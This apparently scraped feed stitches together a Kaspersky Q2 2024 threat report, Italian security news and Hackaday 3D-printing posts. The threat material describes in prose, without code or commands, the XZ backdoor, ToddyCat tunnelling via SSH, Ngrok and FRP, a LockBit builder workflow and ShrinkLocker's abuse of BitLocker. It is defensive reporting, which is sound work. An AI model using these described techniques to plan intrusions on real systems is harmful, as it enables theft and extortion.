To assess the risk of malware infection through the internet faced by user’s computers in different countries and territories, we calculated the share of Kaspersky product users who encountered web antivirus detections during the reporting period for each country and territory. This data indicates the aggressiveness of the environment in which computers operate.

The following statistics are based on the detection verdicts of the web antivirus module, provided by Kaspersky product users who consented to share statistical data.

It’s important to note that only attacks involving malicious objects of the Malware class are included in this ranking. Web antivirus detections for potentially dangerous and unwanted programs, such as RiskTool and adware, were not counted.

*Countries and territories with fewer than 10,000 Kaspersky users were excluded from the calculations.
**Percentage of unique users subjected to web attacks by malicious objects of the Malware class out of all unique Kaspersky product users in that country or territory.

On average during the quarter, 7.38% of the internet users’ computers worldwide were subjected to at least one Malware-category web attack.

Local threats

Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The following statistics are based on detection verdicts from the OAS (on-access scan, scanning when accessing a file) and ODS (on-demand scan, scanning launched by a user) antivirus modules, provided by Kaspersky product users who agreed to share statistical data. These statistics take into account malware found directly on users’ computers or on removable media connected to computers, such as flash drives, camera memory cards, phones, and external hard drives.

In the second quarter of 2024, our file antivirus detected 27,394,168 malicious and potentially unwanted objects.

Countries and territories where users faced the highest risk of local infection

For each country and territory, we calculated the percentage of Kaspersky users on whose computers file antivirus was triggered during the reporting period. This data reflects the level of infection of personal computers across different countries and territories worldwide.

Note that only attacks involving malicious objects of the Malware class are included in this ranking. Detections of potentially dangerous or unwanted programs such as RiskTool and adware were not counted.

*Countries and territories with fewer than 10,000 Kaspersky users were excluded from the calculations.
**Percentage of unique users on whose computers local Malware-class threats were blocked, out of all unique Kaspersky product users in that country or territory.

On average, 14.2% of users’ computers worldwide encountered at least one local Malware-class threat during the second quarter.

The figure for Russia was 15.68%.

securelist.com/it-threat-evolu…

Quarterly figures

According to Kaspersky Security Network, in Q2 2024:

• 7 million attacks using malware, adware or unwanted mobile software were blocked.
• The most common threat to mobile devices was RiskTool software – 41% of all detected threats.
• A total of 367,418 malicious installation packages were detected, of which:
  
  • 13,013 packages were for mobile banking Trojans;
  • 1,392 packages were for mobile ransomware Trojans.

  
  

Quarterly highlights

The number of malware, adware or unwanted software attacks on mobile devices climbed relative to the same period last year, but dropped against Q1 2024, with 7,697,975 attacks detected.

Number of attacks on users of Kaspersky mobile solutions, Q4 2022 – Q2 2024 (download)

The decrease is due to a sharp drop in the activity of adware apps, mostly from the covert applications of the AdWare.AndroidOS.HiddenAd family, which opens ads on the targeted device.

In April of this year, new versions of Mandrake spyware were discovered. Distributed via Google Play, these apps used sophisticated techniques to hide their malicious functionality: concealing dangerous code in an obfuscated native library; using certificate pinning to detect attempts to track app network traffic; and multiple methods to check for emulated runtime environments, such as sandboxes.

A Mandrake app on Google Play

Also in Q2, the IOBot banking Trojan was found targeting users in Korea. To install an additional malware component with VNC backdoor functionality, the Trojan’s authors use a technique to bypass Android protection against granting extended permissions to apps downloaded from unofficial sources.

Mobile threat statistics

The number of Android malware samples fell against the previous quarter to the Q2 2023 level, totaling 367,418 installation packages.

Number of detected malicious installation packages, Q2 2023 – Q2 2024 (download)

New trends emerged in the distribution of detected Adware and RiskTool packages: the former significantly decreased in number, while the latter increased. Otherwise, the number of detections remains largely the same.

Distribution of detected mobile apps by type, Q1*–Q2 2024 (download)

*Data for the previous quarter may differ slightly from previously published data due to some verdicts being retrospectively revised.

Among adware, the number of HiddenAd, BrowserAd and Adlo apps dropped sharply, while the number of RiskTool.AndroidOS.Fakapp apps distributed under the guise of pornographic material rose. These apps collect and forward device information to a server, then open arbitrary URLs sent back in response.

Users attacked by the malware or unwanted software as a percentage* of all targeted users of Kaspersky mobile products, Q1*–Q2 2024 (download)

*The sum may be greater than 100% if the same users encountered more than one type of attack.

Despite the prevalence of RiskTool.AndroidOS.Fakapp installation packages, the number of real users who encountered this family showed no noticeable growth. In other words, attackers released many unique samples, but their distribution was limited.

The main changes in the distribution of the share of attacked users were driven by a fall in the activity of HiddenAd adware and a rise in the activity of two RiskTool apps: Revpn and SpyLoan.

TOP 20 most frequently detected mobile malware programs

Note that the malware rankings below exclude riskware and potentially unwanted software, such as RiskTool or adware.

The generalized cloud verdict DangerousObject.Multi.Generic returned to the top spot, and the cloud AI-delivered verdict DangerousObject.AndroidOS.GenericML also moved up. Also placing highly again were the Fakemoney Trojan, which scams users out of personal data with a promise of easy cash, the pre-installed Dwphon Trojan and modified versions of WhatsApp with built-in Triada modules. The latter include Trojan-Downloader.AndroidOS.Agent.ms.

The Mamont banking Trojan, which steals money by scanning text messages, saw quite a jump in its popularity.

Region-specific malware

This section describes malware whose activity is concentrated in specific countries.

*Country where the malware was most active.
**Unique users who encountered this Trojan modification in the given country as a percentage of all users of Kaspersky mobile solutions targeted by this modification.

Users in Turkey continue to face banking Trojan attacks. At the same time, the list of malware active in the country remains unchanged: the VNC backdoor Tambir, the text message-stealing Trojan BrowBot and Hqwar banking Trojan packers were already mentioned in a past report.

Indonesia still has the largest concentration of UdangaSteal Trojans for stealing text messages. These are often sent to victims under the guise of wedding invitations. Similar to the last quarter, the payment-simulating app FakePay was widespread in Brazil, while users in Thailand ran into the EvilInst Trojan, which sends paid text messages.

A large number of families centered in India made it to the top. Rewardsteal snatches banking data under the pretense of a money giveaway; SmsThief.wk and Agent.ox steal text messages.

Mobile banking Trojans

The number of new unique installation packages for banking Trojans remains at the same level for the third quarter straight.

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q2 2023 – Q2 2024 (download)

The total number of Trojan-Banker attacks is still on the rise, meaning that each new banking Trojan released by threat actors is increasingly used in attacks.

TOP 10 mobile bankers

Mobile ransomware Trojans

The number of ransomware installation packages decreased compared to Q1 2024 to roughly the same level as a year ago.

Number of installation packages for mobile ransomware Trojans detected by Kaspersky, Q2 2023 – Q2 2024 (download)

In the distribution of attacks, Rasket and Rkor ransomware dropped out of the top, and Pigetrl also fell. Other top-ranking families became markedly more active, not only percentage-wise, but in terms of absolute numbers.

securelist.com/it-threat-evolu…

Targeted attacks

XZ backdoor: a supply chain attack in the making

On March 29, a message on the Openwall oss-security mailing list announced the discovery of a backdoor in XZ, a compression utility included in many popular Linux distributions. The backdoored library is used by the OpenSSH server process sshd. On a number of systemd-based distributions, including Ubuntu, Debian and RedHat/Fedora Linux, OpenSSH is patched to use systemd features and is therefore dependent on the library (Arch Linux and Gentoo are not affected). The code was inserted in February and March 2024, mostly by Jia Cheong Tan – probably a fictitious identity. We suspect that the goal of the attack was to introduce exclusive remote code execution capabilities into the sshd process by targeting the XZ build process; and then to push the backdoored code out to major Linux distributions as a part of a large-scale supply chain attack.

Timeline of events

2024.01.19 XZ website moved to GitHub pages by new maintainer (jiaT75)
2024.02.15 “build-to-host.m4” is added to .gitignore
2024.02.23 two “test files” containing the stages of the malicious script are introduced
2024.02.24 XZ 5.6.0 is released
2024.02.26 commit in CMakeLists.txt that sabotages the Landlock security feature
2024.03.04 the backdoor leads to issues with Valgrind
2024.03.09 two “test files” are updated, CRC functions are modified, Valgrind issue is “fixed”
2024.03.09 XZ 5.6.1 is released
2024.03.28 bug is discovered, Debian and RedHat notified
2024.03.28 Debian rolls back XZ 5.6.1 to version 5.4.5-0.2
2024.03.29 an email is published on the oss-security mailing list
2024.03.29 RedHat confirms backdoored XZ was shipped in Fedora Rawhide and Fedora Linux 40 beta
2024.03.30 Debian shuts down builds and starts process to rebuild them
2024.04.02 XZ main developer acknowledges backdoor incident

While earlier supply chain attacks we have seen in Node.js, PyPI, FDroid, and the Linux kernel consisted mostly of atomic malicious patches, fake packages and typo-squatted package names, this incident was a multi-stage operation that came close to compromising SSH servers on a global scale.

The backdoor in the liblzma library was introduced at two levels. The source code of the build infrastructure that generated the final packages was modified slightly (by introducing an additional file build-to-host.m4) to extract the next stage script hidden in a test-case file (bad-3-corrupt_lzma2.xz). This script, in turn, extracted a malicious binary component from another test-case file (good-large_compressed.lzma) that was linked to the legitimate library during the compilation process to be shipped to Linux repositories. Major vendors in turn shipped the malicious component in beta and experimental builds. The XZ compromise was assigned the identifier CVE-2024-3094 and the maximum severity level of 10.

The attackers’ initial goal was to hook one of the functions related to RSA key manipulation. In our analysis of the hook process, we focused on the behavior of the backdoor inside OpenSSH, specifically OpenSSH portable version 9.7p1 (the latest version). Our analysis revealed a number of interesting details about the backdoor’s functionality.

• The attacker set an anti-replay feature to prevent possible capture or hijacking of the backdoor communications.
• The author used a custom steganography technique in the x86 code to hide the public key.
• The backdoor hooks the logging function to hide its logs of unauthorized connections to the SSH server.
• The backdoor hooks the password authentication function to allow the attacker to use any username/password to log in to the infected server without any further verification. It does the same with public key authentication.
• The backdoor has remote code execution capabilities that allow the attacker to execute any system command on the infected server.

It’s clear that this is a highly sophisticated threat. The attackers used social engineering to gain long-term access to the development environment and extended it with fake human interactions in plain sight. They have extensive knowledge of the internals of open-source projects such as SSH and libc, as well as expertise in code/script obfuscation used to initiate the infection process. A number of things make this threat unique, including the way the public key information is embedded in the binary code itself, complicating the recovery process, and the meticulous preparation of the operation.

Kaspersky products detect malicious objects associated with the attack as HEUR:Trojan.Script.XZ and Trojan.Shell.XZ. In addition, Kaspersky Endpoint Security for Linux detects malicious code in sshd process memory as MEM:Trojan.Linux.XZ (as part of the Critical Areas Scan task).

For more information, read our initial analysis, incident assessment and in-depth hook analysis.

DuneQuixote campaign targeting the Middle East

In February, we discovered a new malware campaign targeting government entities in the Middle East that we dubbed DuneQuixote. Our investigation uncovered more than 30 DuneQuixote dropper samples being actively used in this campaign. Some were regular droppers, while others were manipulated installer files for a legitimate tool called Total Commander. The droppers carried malicious code to download a backdoor that we dubbed CR4T. While we have only identified two of these implants, we strongly believe that there may be more in the form of completely different malware. The group behind the campaign took steps to prevent collection and analysis of its implants and implemented practical and well-designed evasion techniques in both network communications and the malware code.

The initial dropper is a Windows x64 executable file, written in C/C++, although there are DLL versions of the malware that provide the same functionality. Upon execution, the malware initiates a series of decoy API calls that serve no practical purpose. These calls are primarily string comparison functions that are executed without any conditional jumps based on the comparison results. The strings specified in these functions are snippets of Spanish poetry. These vary from one sample to the next, changing the signature of each sample to evade traditional detection methods.

The primary goal of the CR4T implant is to give attackers access to a console for command line execution on the infected computer. It also facilitates the download, upload and modification of files.

We also discovered a Golang version of the CR4T implant that has similar capabilities to the C version. A notable difference of this version is the ability to create scheduled tasks using the Golang Go-ole library, which uses Windows Component Object Model (COM) object interfaces to interact with the Task Scheduler service.

Through the use of memory-only implants and droppers masquerading as legitimate software that mimics the Total Commander installer, the attackers demonstrate above-average evasion capabilities and techniques. The discovery of both C/C++ and Golang versions of the CR4T implant highlights the adaptability and ingenuity of the threat actor behind this campaign.

ToddyCat: punching holes in your infrastructure

The threat actor ToddyCat predominantly targets government organizations in the Asia-Pacific region, primarily to steal sensitive data. In our previous article, we described the tools the attackers use to collect and exfiltrate files (LoFiSe and PcExter). More recently, we examined how this threat actor maintains constant access to compromised infrastructure, the information they are interested in and the tools they use to extract it.

Our investigation revealed that ToddyCat was stealing data on an industrial scale. To steal large volumes of data, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor the systems they attack.

ToddyCat used several methods to accomplish this. One was to create a reverse SSH tunnel. They launched this using the SSH client from the OpenSSH for Windows toolkit, along with the library required to run it, an OPENSSH private key file, and a script, a.bat, to hide the private key file. The attackers transferred files to the target host via SMB using shared folders.

The threat actor also made use of the server utility (VPN Server) from the SoftEther VPN package for tunneling. This package is an open-source solution developed as part of academic research at the University of Tsukuba, which allows the creation of VPN connections using a variety of popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.

Another way ToddyCat accessed remote infrastructure was by tunneling to a legitimate cloud provider: an application running on the user’s host with access to the local infrastructure can connect to the cloud through a legitimate agent and redirect traffic or execute specific commands.

Ngrok is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The attackers installed Ngrok on target hosts and used it to redirect command and control (C2) traffic from the cloud infrastructure to a specific port on those hosts.

They also used Krong, a proxy that uses XOR to encrypt the data passing through it, thereby concealing the content of the traffic to avoid detection.

After creating tunnels on the target hosts using OpenSSH or SoftEther VPN, the threat actor also installed the FRP client, a fast reverse proxy written in Go that allows access from the internet to a local server behind a NAT or firewall.

ToddyCat used various tools to collect data. They used one of the tools, which we named “cuthead” (the name came from the file description field of the sample we found), to search for documents. They used “WAExp”, a WhatsApp data stealer, to search for and collect browser local storage files containing data from the web version of WhatsApp. The attackers also used a tool called “TomBerBil” to steal passwords from browsers.

To protect against such attacks, we recommend that organizations add the resources and IP addresses of cloud services that provide traffic tunneling to the corporate firewall denylist. We also recommend limiting the range of tools administrators can use to remotely access hosts: other tools should either be prohibited or closely monitored as possible indicators of suspicious activity. In addition, employees should avoid storing passwords in browsers, as this helps attackers gain access to sensitive information. Moreover, reusing passwords across services increases the amount of data available to attackers.

Other malware

QakBot attacks with Windows zero-day

In early April we investigated the Windows DWM (Desktop Window Manager) Core Library Elevation of Privilege Vulnerability (CVE-2023-36033), which was previously discovered as a zero-day being exploited in the wild. While searching for samples related to this exploit and attacks using it, we found a curious document uploaded to VirusTotal on April 1. This document caught our attention because it had a descriptive file name indicating that it contained information about a Windows vulnerability.

Inside we found a brief description of a Windows DWM vulnerability and how it could be exploited to gain system privileges – all written in very poor English. The exploitation process described in this document was identical to that used in the previously mentioned zero-day exploit for CVE-2023-36033 – but the vulnerability was different.

The poor quality of the writing, and the fact the document was missing some important details about how to actually trigger the vulnerability, suggested that the vulnerability described was completely made up or was present in code that could not be accessed or controlled by attackers.

However, a quick check revealed that this was a real zero-day vulnerability that could be used to escalate privileges, so we immediately reported our findings to Microsoft. The vulnerability was assigned CVE-2024-30051 and a patch was released as part of Patch Tuesday on May 14.

We also began closely monitoring our statistics for exploits and attacks using this zero-day, and in mid-April we discovered an exploit. We have seen this zero-day used in conjunction with QakBot and other malware, and believe that multiple threat actors have access to it.

Kaspersky products detect the exploitation of CVE-2024-30051 and related malware with the following verdicts:

• PDM:Exploit.Win32.Generic;
• PDM:Trojan.Win32.Generic;
• UDS:DangerousObject.Multi.Generic;
• Win32.Agent.gen;
• Win32.CobaltStrike.gen.

Using the LockBit builder to generate targeted ransomware

Last year, we published our research on the LockBit 3.0 builder. Leaked in 2022, this builder greatly simplified the creation of custom ransomware.

The keygen.exe file generates public and private keys used for encryption and decryption. The builder.exe file generates the variant according to the options set in the config.json file. The whole process is automated by the build.bat script.

The builder also allows attackers to choose exactly what they want to encrypt. If they know enough about the target’s infrastructure, they can create malware tailored to the specific configuration of the target’s network architecture, such as important files, administrative accounts and critical systems.

This has allowed attackers to generate customized versions of this threat to suit their needs, making their attacks more effective.

In February, the international law enforcement task force Operation Cronos gained insight into LockBit’s operations after taking down the group. The operation involved law enforcement agencies from 10 countries. They were able to seize the group’s infrastructure, obtain private decryption keys and create a decryption toolset based on a list of known victim IDs obtained by the authorities. However, just a few days later, the ransomware group announced that it was back in action.

In a recent incident response engagement, we were faced with a ransomware attack that involved a ransomware sample created with the same leaked builder. The attackers were able to find the admin credentials in plain text. They created a custom version of the ransomware that used the account credentials to spread across the network and perform malicious activities, such as killing Windows Defender and deleting Windows Event Logs to encrypt data and cover its tracks. In one of our latest articles, we revisited the LockBit 3.0 builder files and analyzed the steps the attackers took to compromise the network.

Stealers, stealers and more stealers

Stealers are a prominent feature of the threat landscape. They are designed to harvest passwords and other sensitive data from infected computers that can then be used in other attacks, resulting in financial loss to the target. Over the past year we have published a number of public and private reports on newly discovered stealers. We recently wrote reports on Acrid, ScarletStealer and Sys01: the first two are new, the latter has been updated.

Acrid, a new stealer discovered in December 2023, is written in C++ for the 32-bit system, despite the fact that most systems are now 64-bit. Upon closer inspection, it became apparent that the authors had compiled it for a 32-bit environment in order to use the “Heaven’s Gate” technique, which allows 32-bit applications to access the 64-bit space to bypass certain security controls. This malware is designed to steal browser data, local cryptocurrency wallets, files with specific names (wallet.dat, password.docx, etc.) and credentials from installed applications (FTP managers, messengers, etc.). The collected data are zipped and sent to the C2.

Last January, we analyzed a downloader we dubbed “Penguish”. One of the payloads it downloaded was a previously unknown stealer called “ScarletStealer” – an odd stealer, since most of its functionality is contained in other binaries (applications and Chrome extensions) that it downloads. When ScarletStealer is executed, it checks for the presence of cryptocurrencies and crypto wallets by looking for certain folder paths (e.g., %APPDATA%\Roaming\Exodus). If anything is detected, it starts downloading the additional executables using PowerShell. Most ScarletStealer executables are digitally signed. This stealer is very underdeveloped in terms of functionality and contains many bugs, errors, and redundant code. Considering the effort it takes to install the malware through a long chain of downloaders, the last of which is Penguish, it’s strange that it’s not more advanced.

SYS01 (aka Album Stealer and S1deload Stealer), a relatively unknown malware that has been around since at least 2022, has evolved from a C# stealer to a PHP stealer. What hasn’t changed is the infection vector. Users are tricked into downloading a malicious ZIP archive disguised as an adult video via a Facebook page.

The archive contains a legitimate binary that sideloads a malicious DLL. This DLL opens an adult video and executes the next payload, which is a malicious PHP file encoded with ionCube. The executed PHP file calls a script, install.bat, which ultimately executes the next stage by running a PowerShell command. This layer is conveniently named “runalayer” and runs what appears to be the final payload called “Newb”. However, we found a difference between the latest version and the previous publicly disclosed versions of the stealer. The current stealer (Newb) includes functionality to steal Facebook-related data and send stolen browser data to the C2. It also contains backdoor functionality. However, we found that the code that actually collects the browser data sent by Newb is in a different sample named “imageclass”. It is not 100% clear how imageclass was pushed to the system; but looking at the backdoor code of Newb, we concluded with a high degree of certainty that imageclass was later pushed through Newb to the infected machine. The initial ZIP archive also contains another malicious PHP file, include.php: this has similar backdoor functionality to Newb and accepts many of the same commands in the same format.

ShrinkLocker: turning BitLocker into a ransomware utility

During a recent incident response engagement, we discovered ransomware called “ShrinkLocker” that uses BitLocker to encrypt compromised computers. BitLocker is the full-disk encryption utility built into Windows that is designed to prevent data exposure on lost or stolen computers.

ShrinkLocker is implemented as a sophisticated VBScript. If the script detects that it’s running on Windows 2000, XP, 2003 or Vista, it shuts down. However, for later versions of Windows, it runs the appropriate portion of its code for the specific operating system. ShrinkLocker shrinks the computer’s drive partitions by 100MB and uses this slack space to create a boot partition for itself. The malware modifies the registry to configure BitLocker to run with the attacker’s settings. It then disables and removes all default BitLocker protections to prevent key recovery and enables the numeric password protection option. The script then generates this password and initiates encryption of all local drives before sending the password and system information to the attacker’s C2 server. Finally, the malware deletes itself and reboots the system.

If the user tries to use the recovery option while the computer is booting, they will see a message stating that no BitLocker recovery options are available.

ShrinkLocker changes the labels of all system drives to the attacker’s email address instead of leaving a ransom note.

You can read our full analysis of ShrinkLocker here.

securelist.com/it-threat-evolu…

Hans-Christoph Steiner

2024-04-01 07:40:23

Three years ago, #FDroid had a similar kind of attempt as the #xz #backdoor. A new contributor submitted a merge request to improve the search, which was oft requested but the maintainers hadn't found time to work on. There was also pressure from other random accounts to merge it. In the end, it became clear that it added a #SQLinjection #vuln. In this case, we managed to catch it before it was merged. Since similar tactics were used, I think its relevant now

gitlab.com/fdroid/fdroidclient…

Search improvements: Sort based on keyword matching and removed alphabetic sort (!889) · Merge requests · F-Droid / Client · GitLab

The search results are pretty unusable currently. So I've changed it to show apps in this order: App name matches keyword, summary matches keyword, description matches keyword. Also,...

^GitLab

Have you ever looked out the window at traffic and seen a giant crane driving alone the road? Have you ever wanted a little 3D printed version you could drive for yourself without the risk of demolishing your neighbors house? Well, [ProfessorBoots] has just the build for you.

The build, inspired by the Liebherr LTM 1300, isn’t just a little RC car that looks like a crane. It’s a real working crane, too! So you can drive this thing around, and you can park it up. Then you can deploy the fully working stabilizer booms like you’re some big construction site hot shot. From there, you can relish in the subtle joy of extending the massive three-foot boom while the necessary counterweight automatically locks itself in place. You can then use the crane to lift and move small objects to your heart’s content.

The video describes how the build works in intimate detail, from the gears and linkages all the way up to the grander assembly. It’s no simple beast either, with ten gearmotors, four servos, and two ESP32s used for control. If you really need to build one for yourself, [ProfessorBoots] sells his plans on his website.

We’ve seen great stuff from [ProfessorBoots] before—he’s come a long way from his skid steer design last year. Video after the break.

youtube.com/embed/faC3Yzz9IqI?…

Thanks to [Hudson Bazemore] for the tip!

hackaday.com/2024/09/03/3d-pri…

Il gruppo hacker di Red Hot Cyber, HackerHood ha scoperto un nuovo 0day sui dispositivi di sicurezza della Zyxel. Questa vulnerabilità di sicurezza è stata scoperta dai ricercatori di sicurezza Alessandro Sgreccia e Manuel Roccon, membri del team di HackerHood, durante le attività di ricerca che svolgono costantemente sugli apparati di Zyxel.

All’interno delle attività di ricerca svolte dal team sugli apparati di Zyxel, è stato individuato ub bug di sicurezza (alcuni sono ancora in gestione dal fornitore) che è stato immediatamente comunicato a Zyxel seguendo le best-practices internazionali della Coordinate Vulnerability Disclosure (CVD).

Le nuove vulnerabilità rilevate su Zyxel

CVE-2024-7203 è una vulnerabilità di iniezione di comandi che colpisce le versioni del firmware (V4.60 – V5.38) dei dispositivi delle serie Zyxel ATP e USG FLEX. Questa falla permette a un attaccante autenticato con privilegi amministrativi di eseguire comandi arbitrari del sistema operativo, sfruttando comandi CLI appositamente costruiti. La vulnerabilità è classificata come ad alta gravità, con un punteggio CVSS di 7.2, indicando un rischio significativo per l’integrità e la riservatezza del sistema.

Puoi trovare maggiori dettagli nell’avviso ufficiale di Zyxel.

Il gruppo hacker di HackerHood

Il gruppo HackerHood, è un gruppo della community di Red Hot Cyber che si è specializzato nelle attività tecnico specialistiche finalizzate all’incentivazione verso la collaborazione attraverso le attività di ethical hacking (penetration test e ricerca 0day), programmazione e malware Analysis.

Uno tra i programmi del gruppo di HackerHood è appunto l’identificazione di bug non documentati (c.d. 0day), dove i membri del team una volta rilevate le vulnerabilità 0day su prodotti di largo consumo, collaborano con i vendor di prodotto per migliorare la sicurezza informatica.

Le attività si svolgono attraverso il processo di Coordinate Vulnerability Disclosure e solo a valle della pubblicazione della fix da parte dei vendor si procede alla disclosure pubblica e alla diffusione di eventuali Proof of Concept (PoC).

Un altro programma di HackerHood è lo svolgimento di attività di penetration test su infrastrutture ICT di aziende italiane che abbracciano politiche di “Responsible disclosure”. Tutto questo consente di dare un contributo al comparto Italia e quindi aiutare le aziende a migliorare la propria sicurezza informatica oltre che incentivare altre persone a fare lo stesso.

Quindi, se sei un analista di sicurezza con skill di ethical hacking o un ricercatore di bug che sposi il Manifesto di HackerHood, potresti essere anche tu un membro di HackerHood. Scrivici quindi alla casella di posta del team: info@hackerhood.it

“Tieni Il Mento Alto. Un Giorno Ci Sarà Di Nuovo La Felicità A Nottingham, Vedrai.” (Robin Hood)

L'articolo HackerHood di RHC scopre un nuovo 0day sui prodotti Zyxel proviene da il blog della sicurezza informatica.

Gli hacker nordcoreani stanno sfruttando una vulnerabilità zero-day in Google Chrome per ottenere il controllo dei sistemi e prendere il controllo delle risorse crittografiche delle vittime.

Microsoft ha confermato che il gruppo Citrine Sleet (precedentemente DEV-0139) ha utilizzato il CVE-2024-7971 zero-day per iniettare il rootkit FudModule dopo aver ottenuto i privilegi di SYSTEM utilizzando un exploit nel kernel di Windows.

L’obiettivo principale degli attacchi è il settore delle criptovalute, dove gli hacker cercano guadagni finanziari. Il gruppo Citrine Sleet è noto da tempo per i suoi attacchi contro le istituzioni finanziarie, ma soprattutto contro le organizzazioni che operano nel settore delle criptovalute e i loro dipendenti. In precedenza, gli hacker erano associati all’intelligence nordcoreana.

Citrine Sleet (AppleJeus, Labyrinth Chollima, UNC4736) ha ripetutamente utilizzato siti Web falsi mascherati da piattaforme di scambio di criptovalute legittime. Gli hacker hanno infettato i sistemi delle vittime attraverso false domande di lavoro o tramite falsi portafogli e applicazioni commerciali. Ad esempio, nel marzo 2023, UNC4736 ha compromesso la catena di fornitura del software di videoconferenza 3CX, provocando l’hacking del software X_TRADER, progettato per automatizzare il commercio di azioni.

Anche il Google Threat Analysis Group (TAG) ha confermato il collegamento del gruppo AppleJeus con la compromissione del sito web di Trading Technologies. Il governo degli Stati Uniti mette in guardia da anni sui rischi posti dagli hacker nordcoreani che prendono di mira le società di criptovaluta e i loro dipendenti utilizzando il malware AppleJeus.

Una settimana fa, Google ha corretto la vulnerabilità zero-day CVE-2024-7971, nel motore JavaScript V8 utilizzato in Chrome. Il bug consentiva agli aggressori di eseguire codice remoto nella sandbox del browser Chromium, dopodiché gli aggressori potevano utilizzare il browser per scaricare l’exploit CVE-2024-38106 nel kernel di Windows. L’attacco consente agli hacker di ottenere i diritti di SYSTEM e di iniettare in memoria ilrootkit FudModule, che viene utilizzato per manipolare gli oggetti del kernel e aggirare i meccanismi di sicurezza.

Dalla sua scoperta nell’ottobre 2022, il rootkit FudModule è stato utilizzato anche da un altro gruppo di hacker nordcoreano, Diamond Sleet, che utilizza strumenti di attacco e infrastrutture simili. Nell’agosto 2024, Microsoft ha rilasciato un aggiornamento di sicurezza che risolve la vulnerabilità CVE-2024-38193 nel driver AFD.sys, utilizzato anche negli attacchi Diamond Sleet .

L'articolo Lo 0-day di Google Chrome viene sfruttato dagli Hacker Nord-Coreani per Svuotare i Wallett di Criptovaluta proviene da il blog della sicurezza informatica.

È emersa una notizia allarmante nel mondo della sicurezza informatica: un attore malevolo, che si fa chiamare “Satanic”, ha pubblicato su BreachForums un presunto database sottratto all’azienda Galdieri Rent, specializzata nel noleggio di automobili.

La fuga di dati, avvenuta il 2 settembre 2024, ha suscitato preoccupazione sia per la portata delle informazioni esposte che per le potenziali conseguenze per i clienti dell’azienda.

Al momento, non possiamo confermare la veridicità della notizia, poiché l’organizzazione non ha ancora rilasciato alcun comunicato stampa ufficiale sul proprio sito web riguardo l’incidente. Pertanto, questo articolo deve essere considerato come ‘fonte di intelligence’.

Il gruppo Satanic Cloud

The Satanic Cloud è un gruppo di hacker relativamente nuovo ma già noto nel mondo della sicurezza informatica per la sua attività di diffusione di dati sensibili rubati. Questo gruppo ha guadagnato notorietà per aver pubblicato su BreachForums database sottratti da diverse organizzazioni, inclusi enti scolastici di grandi dimensioni come il Los Angeles Unified School District (LAUSD).

Una delle loro azioni più eclatanti è stata la divulgazione di un vasto set di dati che includeva informazioni personali di oltre 24 milioni di studenti e migliaia di insegnanti e personale scolastico. Questo attacco è stato facilitato da una vulnerabilità nel servizio Amazon Relational Database Service (RDS), dimostrando come il gruppo sia in grado di sfruttare falle in piattaforme cloud per ottenere accesso a dati sensibili. Il leader del gruppo, noto come “Satanic”, ha usato piattaforme come Telegram e BreachForums per diffondere e vendere queste informazioni.

Oltre ai dati scolastici, The Satanic Cloud è stato coinvolto anche in altre operazioni di diffusione di dati rubati, mostrando un interesse crescente per la monetizzazione dei dati attraverso il dark web e altre piattaforme di scambio di dati illeciti​(HackRead, Auth Lab, The 74 Million).

Dettagli della possibile violazione

Secondo il post pubblicato dall’hacker, il database compromesso conterrebbe una quantità significativa di dati sensibili.

In particolare, il database includerebbe informazioni su:

• 100.000 utenti registrati: Con dati personali come ID, nome, cognome, email, numero di telefono, password e indirizzo di residenza.
• 130.000 leads: Potenziali clienti con dati di contatto che potrebbero essere utilizzati per attività di marketing o, peggio, per scopi malevoli.
• 8.000 automobili: Dati dettagliati sui veicoli, che potrebbero comprendere modelli, numeri di targa e altre informazioni specifiche.

Il post dell’hacker, che includeva anche un invito a scaricare il database tramite un link fornito, evidenzia la gravità della situazione. Questi dati, se finissero nelle mani sbagliate, potrebbero essere utilizzati per una vasta gamma di attività illecite, dal furto di identità a truffe mirate.

Conclusione

La presunta violazione del database di Galdieri Rent è un chiaro segnale dell’importanza di adottare misure di sicurezza avanzate per proteggere i dati personali. In un contesto in cui le minacce informatiche sono in costante aumento, le aziende devono essere pronte a difendersi da attacchi sempre più sofisticati. I clienti, d’altra parte, devono essere consapevoli dei rischi e pronti a prendere le precauzioni necessarie per proteggere i propri dati.

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.

L'articolo Presunta Violazione del Database di Galdieri Rent pubblicato su BreachForums proviene da il blog della sicurezza informatica.

[Scott Yu-Jan] is a big fan of the iPhone’s standby mode. Put the phone on charge horizontally, and it looks all stylish, with sleek widgets and clocks and stuff showing you information you presumably care about. [Scott] enjoyed this so much, in fact, he whipped up a custom charging dock to make the most of it.

The design was a collaboration with artist [Overwork], who mentioned the DN 40 alarm clock created by legendary designer [Dieter Rams]. [Overwork] sent [Scott] a draft inspired by that product, and he printed one up. It featured an integrated MagSafe charger to juice up the iPhone, and pressing into one side of the phone would pop it free. It was cool, but a little clumsy to use.

[Scott] liked the basic concept, but shows us how he iterated upon it to make it even nicer. He added in a wireless charger for AirPods in the back, gave the device adhesive feet, and a big chunky eject button to release the phone when desired.

You can also grab the files to print your own if you so desire! We’ve seen [Scott’s] work before, too, like his neat 3D scanner build. Video after the break.

youtube.com/embed/L3nWw8qSYgk?…

hackaday.com/2024/09/02/buildi…

Benchy is that cute little boat that everyone uses to calibrate their 3D printer. [Emily The Engineer] asked the obvious question—why isn’t it a real working boat? Then she followed through on the execution. Bravo, [Emily]. Bravo.

The full concept is straightforward, but that doesn’t make it any less fun. [Emily] starts by trying to get small Benchys to float, and then steadily steps up the size, solving problems along the way. By the end of it, the big Benchy is printed out of lots of smaller sections that were then assembled into a larger whole. This was achieved with glue and simply using a soldering iron to melt parts together. It’s a common technique used to build giant parts on smaller 3D printers, and it works pretty well.

